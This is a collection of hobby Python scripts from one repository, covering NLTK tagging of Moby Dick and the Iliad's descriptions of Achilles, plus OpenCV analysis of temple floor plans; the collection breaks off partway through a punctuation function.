"language": "Python",
"length_bytes": 904,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 37,
"path": "/Scribe_Project/test_code.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 26 13:16:38 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n#nltk.download('nps_chat')\n#posts = nltk.corpus.nps_chat.xml_posts()[:10000]\n\n\n#def dialogue_act_features(post):\n# features = {}\n# for word in nltk.word_tokenize(post):\n# features['contains({})'.format(word.lower())] = True\n# return features\n\n#def TypeDetect(line):\n# print(classifier.classify(dialogue_act_features(line)))\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\n\n#featuresets = [(dialogue_act_features(post.text), post.get('class')) for post in posts]\n#\n#size = int(len(featuresets) * 0.1)\n#\n#train_set, test_set = featuresets[size:], featuresets[:size]\n#\n#classifier = nltk.NaiveBayesClassifier.train(train_set)\n#\n#print(nltk.classify.accuracy(classifier, test_set))\n#\n#print(classifier.classify(dialogue_act_features(\"I saw a box.\")))"
},
{
"alpha_fraction": 0.5149674415588379,
"alphanum_fraction": 0.5336225628852844,
"avg_line_length": 22.76344108581543,
"blob_id": "f4ec93f17db28cc1d055ed45aef2d9eb8ff85f05",
"content_id": "dab7f4fc7312003534819e8715fa688a351991a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2305,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 93,
"path": "/Scribe_Project/scribe.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 16 12:51:16 2020\r\n\r\n@author: am_ka\r\n\"\"\"\r\n\r\nimport nltk\r\nfrom nltk.book import *\r\n\r\nimport re\r\n\r\nmoby_lines = nltk.corpus.gutenberg.sents('melville-moby_dick.txt')\r\nprint(\"Corpus Loaded\")\r\n\r\n# Stores each encoded sentence\r\ncodex = []\r\n# Stores each unique sentence code\r\nreference = []\r\n\r\n#\r\n# Iterate through each sentence, initiate an empty string and iterate through\r\n# each word. Tokenize/tag each word and add the tags denoting an adjective,\r\n# noun, verb or adverb to the empty string, creating a sequence of tags that \r\n# denotes the basic structure of that sentence. Add the sequence to the codex \r\n# list.\r\n# \r\n\r\ncount = 0\r\nfor lines in moby_lines:\r\n sequence = ''\r\n for i in lines:\r\n count += 1\r\n # print(\"Processing Word \" + str(count) + ': ' + i)\r\n token = nltk.word_tokenize(i)\r\n tagged = nltk.pos_tag(token)\r\n for tok, tag in tagged:\r\n if tag.startswith('JJ'):\r\n sequence += '(JJ)'\r\n elif tag.startswith('NN'):\r\n sequence += '(NN)'\r\n elif tag.startswith('V'):\r\n sequence += '(V)'\r\n elif tag.startswith('R'):\r\n sequence += '(R)'\r\n codex.append(sequence) \r\n \r\nprint(\"Codex Complete\") \r\n\r\n# Compile an alternate list of unique existing sequences. \r\nfor i in codex:\r\n if i in reference:\r\n pass\r\n else:\r\n reference.append(i)\r\n \r\nprint(\"Reference Complete\")\r\n\r\n# Compare the amount of sentence sequences with individual known sequences.\r\nprint(\"Length of Codex: \" + str(len(codex)))\r\nprint(\"Length of Reference: \" + str(len(reference)))\r\n\r\n''' \r\n Determine which tags begin each sentence,\r\n '(NN)': 23\r\n '(VV)': 17\r\n etc.\r\n \r\n Moby Dick\r\n NN: 5085\r\n V: 2382\r\n '': 99\r\n R: 1729\r\n JJ: 764\r\n \r\n'''\r\n#c = 0\r\n#starters = {}\r\n#expression = r\"^(\\([A-Z][A-Z]\\)|\\([A-Z]\\))+?\"\r\n#for j in codex:\r\n# if j != '':\r\n# c += 1\r\n# print(str(c) + \": \" + j)\r\n# m = (re.search(expression, j)).group(1)\r\n# if m in starters:\r\n# starters[m] += 1\r\n# else:\r\n# starters[m] = 1\r\n# else:\r\n# if '' in starters:\r\n# starters[''] += 1\r\n# else:\r\n# starters[''] = 1\r\n\r\n"
},
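scribe.py above POS-tags each word in isolation, which starves the tagger of context; tagging the whole tokenized sentence at once is both faster and more accurate. A minimal sketch, assuming the NLTK tokenizer and tagger models are downloaded (the tag filter here is a simplified stand-in for the file's own encoding):

import nltk

# nltk.download('punkt'); nltk.download('averaged_perceptron_tagger')
sentence = "Call me Ishmael ."
tagged = nltk.pos_tag(sentence.split())   # one call per sentence, not per word
sequence = ''.join('({})'.format(tag[:2]) for _, tag in tagged
                   if tag[:2] in ('JJ', 'NN', 'VB', 'RB'))
print(tagged, sequence)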
{
"alpha_fraction": 0.6156583428382874,
"alphanum_fraction": 0.6583629846572876,
"avg_line_length": 16.5,
"blob_id": "9c6c51740278358382e1a0561d33c037feaedded",
"content_id": "d28522e7dfde9285cace8225b32a3caa65a1c89d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 16,
"path": "/Scribe_Project/test_II.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:40:37 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\ndef tagPhrase(phrase):\n phrase_tag = nltk.pos_tag(tokenizeWord(phrase))\n return phrase_tag\n\n"
},
{
"alpha_fraction": 0.5929387211799622,
"alphanum_fraction": 0.6053997874259949,
"avg_line_length": 21.880952835083008,
"blob_id": "b4c31803f9d143f8c56fcdaadf08a33b5f642942",
"content_id": "26c95ff13dda6c83304330370fdbf5934f867e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 42,
"path": "/Scribe_Project/scribe_II.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:50:27 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n\n# Load NLTK Corpus\n#from nltk.book import *\n#moby_lines = nltk.corpus.gutenberg.sents('melville-moby_dick.txt')\n#print(\"Corpus Loaded\")\n\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\ndef tagPhrase(phrase):\n phrase_tag = nltk.pos_tag(tokenizeWord(phrase))\n return phrase_tag\n\ngram = \"NP: {<DT>?<JJ>*<NN>}\"\n\ndef makeTree(sentence, grammar):\n cp = nltk.RegexpParser(grammar)\n tree = cp.parse(tagPhrase(sentence))\n print(tree)\n # tree.draw()\n\n''' \n Declarative Sentence: subject + verb ... (subj + VERB)\n \n Interrogative Sentence: (word +) auxiliary + subject + verb \n \n Imperative Sentence: base verb... (+ VERB +)\n \n Exclamative Sentence: 'What' (+ adjective) + noun + subject + verb\n 'How' (+ adjective/adverb) + subject + verb\n \n'''\n\n\n"
},
{
"alpha_fraction": 0.5176304578781128,
"alphanum_fraction": 0.5557122826576233,
"avg_line_length": 20.54838752746582,
"blob_id": "8058655d9773b5c5e9516e5070d69e0f57c12bcd",
"content_id": "d49ba2409048657f556a34228e53f8a2de82f55a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/TempleLayout_Analyzer/Concept1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 11 11:02:51 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndarkSpace = []\r\nwhiteSpace = []\r\notherDark = []\r\n\r\nimg = Image.open(\"TempleTeos.jpg\")\r\npx = img.getpixel((x, y))\r\nfor y in range(img.height):\r\n for x in range(img.width):\r\n if px = (255, 255, 255):\r\n whiteSpace.append(px)\r\n elif px = (0, 0, 0):\r\n darkSpace.append(((px),(x, y)))\r\n otherDark.append(px)\r\n\r\n\r\n#WidthPeaks = []\r\notherDark.sort(reverse=True)\r\n \r\n#dec = zip(TempleWidth, range(len(TempleWidth)))\r\n#for w, p in list(sorted(dec, reverse=True))[:5]:\r\n# print(w, p) "
},
{
"alpha_fraction": 0.5448379516601562,
"alphanum_fraction": 0.5795026421546936,
"avg_line_length": 20.913793563842773,
"blob_id": "12932645ff01d35c99a9c72d29328c8b0f365d1d",
"content_id": "e69e6e2a226c4006a83061ec61358febd3a1e823",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 58,
"path": "/TempleLayout_Analyzer/HarrisCornerDetect3.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 22 15:45:19 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n#a = np.array(aList[]) then they become booliens\r\n#a > 0 gives us an array of booliens\r\n#sum(a > 0) returns all trues\r\nfilename = 'Temple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nrowSums = []\r\na = np.array(dst[0])\r\n#for y in range(len(dst)):\r\n #a = np.array(dst)\r\nprint(sum(a > 0))\r\n \r\n#rowSums = []\r\n#for y in range(len(dst)):\r\n# rowSums.append(sum(a > 0))\r\n# \r\n#colSums = []\r\n\r\n#for x in range(len(dst[0])):\r\n# colSums.append(sum(dst[:,x]))\r\n \r\n#threshold = 30\r\n\r\n#TempleWidth = []\r\n#for y in range(len(dst)):\r\n# TempleWidths=[]\r\n# for x in range(len(dst[0])):\r\n# if dst[y, x] > threshold:\r\n# TempleWidths.append(dst[y, x])\r\n# TempleWidth.append(int(len(TempleWidths)))\r\n# \r\n#TempleHeight=[]\r\n#for x in range(len(dst)):\r\n# TempleHeights=[]\r\n# for x in range(len(dst[0])):\r\n# if dst[y, x] > threshold:\r\n# TempleHeights.append(dst[y, x])\r\n# TempleHeight.append(int(len(TempleHeights)))\r\n\r\ncv2.imwrite('output.jpg', img)"
},
{
"alpha_fraction": 0.5937122106552124,
"alphanum_fraction": 0.6324062943458557,
"avg_line_length": 20.405405044555664,
"blob_id": "0809963429f8e4ecd503a92066e33a54d10ac2b4",
"content_id": "7dd1040cd83fcecf2a7c5e3c788c03ec09377234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 37,
"path": "/Illiad_Reader/iliadPerseus.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 13 14:44:22 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n#import requests\r\nurl = 'http://www.perseus.tufts.edu/hopper/xmlchunk?doc=Perseus%3Atext%3A1999.01.0134%3Abook%3D1%3Acard%3D1'\r\n\r\nresponse = requests.get(url)\r\n\r\nif not response.ok:\r\n response.raise_for_status()\r\n \r\nfile = open('iliad-perseus.xml', 'wb')\r\nfile.write(response.content)\r\nfile.close()\r\n\r\nfrom xml.etree import ElementTree as ET\r\n\r\ndoc = ET.parse('iliad-perseus.xml').getroot()\r\n\r\nchaps = doc.findall('.//div1[@type=\"chapter\"]')\r\nprint(\"Found\", len(chaps), \"chapters.\")\r\n\r\nplaintext = []\r\n\r\nfor chap in chaps:\r\n for note in chap.findall('note'):\r\n chap.remove(note)\r\n \r\n this_text= ' '. join(chap.itertext())\r\n plaintext.append(this_text)\r\n \r\niliad = ' '.join(plaintext)\r\n\r\nprint(len(iliad))"
},
{
"alpha_fraction": 0.5913200974464417,
"alphanum_fraction": 0.6437612771987915,
"avg_line_length": 21.125,
"blob_id": "d801717cb7854e4f03fdb62be4e5605a2c26b5dc",
"content_id": "c708d6841cb77609cf8622c1f182d968225a54a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 553,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/TempleLayout_Analyzer/CannyLineDetect.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 15:48:40 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread('Temple.png', 0)\r\nedges = cv2.Canny(img, 100, 200)\r\n\r\nplt.subplot(121), plt.imshow(img, cmap = 'gray')\r\nplt.title('Original Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122), plt.imshow(edges, cmap = 'gray')\r\nplt.title('Uncanny Output'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()\r\n#cv2.imwrite('Uncanny Output.jpg', img)\r\n\r\n\r\n#Works fine but needs to be callable"
},
{
"alpha_fraction": 0.5216480493545532,
"alphanum_fraction": 0.5649441480636597,
"avg_line_length": 19.5,
"blob_id": "ef2bb5341c3313547d744b43449cdfe070ff876f",
"content_id": "356c83fdce0573dfb7f31d01b68b71ee86b2e4b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1432,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 66,
"path": "/TempleLayout_Analyzer/CellaDetector.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 10 13:50:31 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nfilename = 'AnotherTemple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\nkernel = np.ones((5, 5), np.uint8)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nv_offset = 5\r\n\r\ncores = []\r\nimg_dilation = cv2.dilate(img, kernel, iterations = 2)\r\n\r\nfor y in range(v_offset, len(img_dilation)-v_offset):\r\n w = len(img_dilation[y])\r\n c = w // 2\r\n l = c - w // 20\r\n r = c + w // 20\r\n t = y - v_offset\r\n b = y + v_offset\r\n \r\n core = sum(np.ravel(img_dilation[t:b, l:r]))\r\n \r\n cores.append(core)\r\n \r\nplt.plot(cores)\r\n\r\n\r\nwall_x = img_dilation.shape[1] // 2\r\nwall_y = np.argmin(cores) + v_offset\r\n\r\nimg_annotated = img_dilation.copy()\r\ncv2.circle(img_annotated, (wall_x, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)\r\ncv2.imwrite('output_AnotherOutput.jpg', img_annotated)\r\n\r\nstarts = []\r\nlens = []\r\ngoing = False\r\n\r\nfor x in range(len(img_dilation[wall_y])):\r\n if img_dilation[wall_y, x] > 0:\r\n going = False\r\n else:\r\n if going:\r\n lens[-1] += 1\r\n else:\r\n lens.append(1)\r\n starts.append(x)\r\n going = True\r\n \r\n"
},
{
"alpha_fraction": 0.5937593579292297,
"alphanum_fraction": 0.6003600358963013,
"avg_line_length": 24.830644607543945,
"blob_id": "c601d3096f3334e2a1b7e6e91f58ae5c464ee359",
"content_id": "6223d7e36b7c812732ad2974eb084869a89f0023",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3333,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 124,
"path": "/Illiad_Reader/AchillesReaderIII_Annotated.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "''' 02/08/2020 This script processes the Iliad, or it did when I still had Academic-based \r\naccess to the Perseus Database. It reads it as Cards, joins the cards into the actual \r\nbooks and stores the books as massive strings in a list. Each book is looped through again\r\nand if a line contiains any mention of Achilles it is processed and its descriptors extracted.'''\r\n\r\n\r\n# import statements\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\n\r\n\r\nimport sys\r\n#import os\r\n#from nltk.parse import stanford\r\n\r\n# global values\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0'}\r\n\r\n#definition of positive and negative words\r\nposWords = ['valiant', 'brilliant', 'swift-footed', 'glorious', 'great-hearted', 'godlike', 'godly', 'fair', 'great']\r\nnegWords = ['perish', 'perished', 'fatal', 'distressed', 'bitter', 'hollow', 'dead', 'evil']\r\n\r\n\r\n# Write a function to look for Achilles \r\n\r\ndef paraHasAchilles(para):\r\n #return True if paragraph mentions Achilles\r\n result = False\r\n if 'Achil' in para:\r\n result = True\r\n #Achilles sometimes referenced as 'Son of Peleus'\r\n elif 'Peleus' in para:\r\n result = True\r\n\r\n return result\r\n\r\n# main code starts here\r\n# parse XML document\r\nxml = ET.parse(file).getroot()\r\n\r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n\r\n\r\n# this will hold book data\r\nbooks = []\r\n\r\n# read book by book \r\nfor book in xml.findall('.//tei:div[@subtype=\"book\"]', ns):\r\n \r\n # save the book number\r\n book_num = book.get('n')\r\n\r\n # this will hold extracted text for this book only\r\n text_segments = []\r\n\r\n # loop over XML chapter elements in this book\r\n for card in book.findall('.//tei:div[@subtype=\"card\"]', ns):\r\n \r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n\r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n\r\n # add to long string\r\n text_segments.append(this_text)\r\n\r\n\r\n book_text = ' '.join(text_segments)\r\n \r\n \r\n \r\n books.append(book_text)\r\n\r\n # do nlp stuff\r\n # this will hold nounds and adjs for this book\r\n\r\n adjs = []\r\n nouns = []\r\n\r\n # segment each book into sentences\r\n sentences = nltk.sent_tokenize(book_text)\r\n \r\n charCount = 0\r\n # loop over sentences\r\n for sentence in sentences:\r\n for word in sentences:\r\n for char in word:\r\n charCount = charCount + 1\r\n \r\n # only consider sentences mentioning achilles\r\n if paraHasAchilles(sentence):\r\n\r\n # tokenize & pos-tag\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n\r\n # check for adjs and nouns, then store them\r\n for tok, pos in tagged:\r\n\r\n if pos == 'JJ':\r\n adjs.append(tok)\r\n\r\n elif pos.startswith('NN'):\r\n nouns.append(tok)\r\n\r\n# count pos, neg words\r\n# initialize counts\r\n\r\n posCount = 0\r\n negCount = 0\r\n\r\n# count positive descriptors\r\n for w in posWords:\r\n posCount = posCount + adjs.count(w)\r\n\r\n # count negative descriptors\r\n for w in negWords:\r\n negCount = negCount + adjs.count(w)\r\n\r\n print('{}\\t{}\\t{}'.format(book_num, posCount, negCount))\r\n\r\n "
},
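A minimal sketch of the tagging step the script above relies on: nltk.word_tokenize plus nltk.pos_tag over one sentence, keeping JJ adjectives and NN* nouns. It assumes the nltk 'punkt' and 'averaged_perceptron_tagger' data packages are installed; the sample sentence is invented for illustration.

import nltk

sentence = "the swift-footed hero answered the glorious king."
tokens = nltk.word_tokenize(sentence)   # split into word tokens
tagged = nltk.pos_tag(tokens)           # [(token, part-of-speech), ...]

adjs = [tok for tok, pos in tagged if pos == 'JJ']
nouns = [tok for tok, pos in tagged if pos.startswith('NN')]
print(adjs)    # descriptors, e.g. ['swift-footed', 'glorious']
print(nouns)   # e.g. ['hero', 'king']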
{
"alpha_fraction": 0.5685928463935852,
"alphanum_fraction": 0.5827084183692932,
"avg_line_length": 23.620689392089844,
"blob_id": "ba857280c00baf2e492cc7bef63b916e354825ab",
"content_id": "313c9f9418fc83212b3881ac36582ba68faf5eaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 87,
"path": "/Illiad_Reader/AchillesReader.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 25 15:56:57 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\nimport os\r\nfrom nltk.parse import stanford\r\n\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0',}\r\nxml = ET.parse(file).getroot()\r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n \r\npara = []\r\nfor card in cards:\r\n para.append(' '.join(card.itertext()))\r\n \r\nplaintext = []\r\n# loop over xml chapter elements\r\nfor card in cards:\r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n # add to long string\r\n plaintext.append(this_text)\r\n \r\n# now paste it all together\r\niliad = ' '.join(plaintext) \r\n\r\n#look for Achilles\r\ndef paraHasAchilles(para):\r\n \r\n result = False\r\n \r\n if 'Achil' in para:\r\n result = True\r\n elif 'Peleus' in para:\r\n result = True\r\n \r\n return result\r\n\r\nsentences = nltk.sent_tokenize(iliad)\r\ntokens = nltk.word_tokenize(sentences[2])\r\ntagged = nltk.pos_tag(tokens)\r\n\r\nadjs = []\r\nnouns = []\r\n\r\nfor sentence in sentences:\r\n if paraHasAchilles(sentence):\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n for tok, pos in tagged:\r\n if pos == 'JJ':\r\n adjs.append(sentence)\r\n elif pos.startswith('NN'):\r\n nouns.append(sentence)\r\n#print('adjs: ', adjs) \r\n#print('nouns: ', nouns)\r\n \r\ndef sections(l, n):\r\n #Yield successive n-sized chunks from l.\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n \r\nposWords = \"valiant brilliant swift-footed glorious great-hearted godlike godly fair great\"\r\nnegWords = \"perish perished fatal distressed bitter hollow dead evil\"\r\n\r\nnumb = 0\r\n\r\nfor i in sections(adjs, 100):\r\n numb = numb + 1\r\n posCount = 0\r\n for adj in posWords.split():\r\n posCount = posCount + adjs.count(adj)\r\n negCount = 0\r\n for adj in negWords.split():\r\n negCount = negCount + adjs.count(adj)\r\n print('posCount', numb, ':', posCount)\r\n print('negCount', numb, ':', negCount)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
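The sections() helper above is a plain chunking generator; the same idea exercised on a toy list:

def sections(l, n):
    # yield successive n-sized chunks from l
    for i in range(0, len(l), n):
        yield l[i:i + n]

for chunk in sections(list(range(10)), 4):
    print(chunk)   # [0, 1, 2, 3] then [4, 5, 6, 7] then [8, 9]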
{
"alpha_fraction": 0.616892397403717,
"alphanum_fraction": 0.6379187703132629,
"avg_line_length": 23.071428298950195,
"blob_id": "d036f2800f7090a5d808ab00b57129ec9ffc6586",
"content_id": "f7c534aeb72e4ebded41cca1e09ae8cb5be39f02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2806,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 112,
"path": "/TempleLayout_Analyzer/cella_wall.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#\r\n# Load the image\r\n#\r\n\r\nimg = cv2.imread('TempleTeos.jpg')\r\ngrey = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\nkernel = np.ones((5, 5))\r\neroded = cv2.dilate(grey, kernel)\r\n\r\n# Otsu's thresholding after Gaussian filtering\r\n# - see https://docs.opencv.org/3.4.0/d7/d4d/tutorial_py_thresholding.html\r\nret, b_w = cv2.threshold(eroded, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n\r\ndilated = cv2.erode(b_w, kernel)\r\n\r\nplt.figure(figsize=(15,10))\r\nplt.subplot(1, 2, 1)\r\nplt.imshow(eroded)\r\nplt.subplot(1, 2, 2)\r\nplt.imshow(dilated)\r\n\r\n\r\n#\r\n# Find the cella wall in the y dimension\r\n#\r\n\r\n# image dimensions\r\nheight, width = b_w.shape\r\ncenter = width // 2\r\n\r\n# this offset is one-half the height of the rectangular sample that constitutes a \"core\"\r\nv_offset = 5 # arbitrary\r\n# this is one-half the width of the core\r\nh_offset = width // 20 # 5 percent of the image width\r\n\r\n\r\n# traverse the y dimension of the image, travelling down the centre\r\n# - take \"cores\" at each y position\r\ncores = []\r\n\r\nfor y in range(v_offset, height-v_offset):\r\n \r\n # calculate sides of the core sample rectangle\r\n left = center - h_offset\r\n right = center + h_offset\r\n top = y - v_offset\r\n bottom = y + v_offset\r\n \r\n # add the pixels values within the sample\r\n core = sum(np.ravel(b_w[top:bottom, left:right]))\r\n \r\n # collect the core\r\n cores.append(core)\r\n \r\n# FIXME: x pos of the cella wall is center of the image\r\nwall_x = center\r\n# y pos of the cella wall is the minimum core value (most black pixels), plus offset\r\nwall_y = np.argmin(cores) + v_offset\r\n\r\n# annotate the image\r\nimg_annotated = img.copy()\r\ncv2.circle(img_annotated, (wall_x, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)\r\n\r\n\r\n#\r\n# Calculate the length of the cella wall, find true center\r\n#\r\n\r\n# get continuous black segments along a given x\r\n\r\n# start (i.e. left edge) of each segment\r\nstarts = []\r\n# length of each segment\r\nlens = []\r\n\r\n# when this is True, we're in the middle of a seg\r\ngoing = False\r\n\r\n# traverse the cross-section:\r\n# - if the pixel is white\r\n# any ongoing segment is finished\r\n# - if the pixel is black\r\n# any ongoing segment is continued\r\n# otherwise, a new segment is started\r\nfor x in range(width):\r\n if b_w[wall_y, x] > 0:\r\n going = False\r\n else:\r\n if going:\r\n lens[-1] += 1\r\n else:\r\n lens.append(1)\r\n starts.append(x)\r\n going = True\r\n\r\n# which seg is the longest one?\r\ni = np.argmax(lens)\r\n\r\n# figure out edges of the cella\r\nleft = starts[i]\r\ncenter = left + lens[i] // 2\r\n\r\n# new annotated image\r\nimg_annotated = img.copy()\r\ncv2.circle(img_annotated, (center, wall_y), 10, (255, 0, 0), 5)\r\nplt.imshow(img_annotated)"
},
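The "core sampling" pass in cella_wall.py reduces to summing pixel values in a sliding window and taking the argmin of the sums; a toy version on a synthetic thresholded image (255 = white, 0 = black, as after Otsu), with made-up offsets:

import numpy as np

b_w = np.full((100, 60), 255, dtype=np.uint8)
b_w[40:50, :] = 0                     # a dark horizontal band, 10 rows tall

v_off, h_off, cx = 5, 10, 30          # half-height / half-width of the core, centre x
cores = [int(b_w[y - v_off:y + v_off, cx - h_off:cx + h_off].sum())
         for y in range(v_off, 100 - v_off)]
wall_y = int(np.argmin(cores)) + v_off
print(wall_y)                         # 45: the window sits fully on the dark band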
{
"alpha_fraction": 0.5708020329475403,
"alphanum_fraction": 0.591478705406189,
"avg_line_length": 44.61428451538086,
"blob_id": "d5b227c0c454057aeb81dbd2112414b18182852a",
"content_id": "be784bcfecc1a7dad2431e32905357f473c21432",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3200,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 70,
"path": "/Phrase_Segmentation/add_punctuation_function.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu June 18 09:24:33 2020\n\n@author: am_ka\n\"\"\"\n\n''' Testing Function to add periods to text-from-speech'''\n\nimport nltk \n\ndef PhraseMaker(text):\n phrase = text.split(' ') # Convert a string to a list\n precursor = [('X', 'Y')] # The initial 'precursor' value is arbitrary, it will\n # denote the word type that comes before 'i'\n \n word = 0 # keeps track of sentence length\n for i in phrase:\n \n word_tagged = nltk.pos_tag(nltk.word_tokenize(i))\n \n if not word_tagged: # Test for empty list\n continue\n \n else:\n word += 1\n print(\"{0}: {1} {2}\".format(word, word_tagged[0][0], word_tagged[0][1]))\n # Feasible word-type pairings based off the findings in 'mobydick_phrase_endings.py'\n pair1 = precursor[0][1].startswith('DT') and word_tagged[0][1].startswith('NN')\n pair2 = precursor[0][1].startswith('NN') and word_tagged[0][1].startswith('NN')\n pair3 = precursor[0][1].startswith('IN') and word_tagged[0][1].startswith('NN')\n # 'pair4' mostly for testing purposes, matching at least one position in the test phrase 'words'\n pair4 = precursor[0][1].startswith('DT') and word_tagged[0][1].startswith('IN')\n pair5 = precursor[0][1].startswith('PRP$') and word_tagged[0][1].startswith('NN')\n pair6 = precursor[0][1].startswith('IN') and 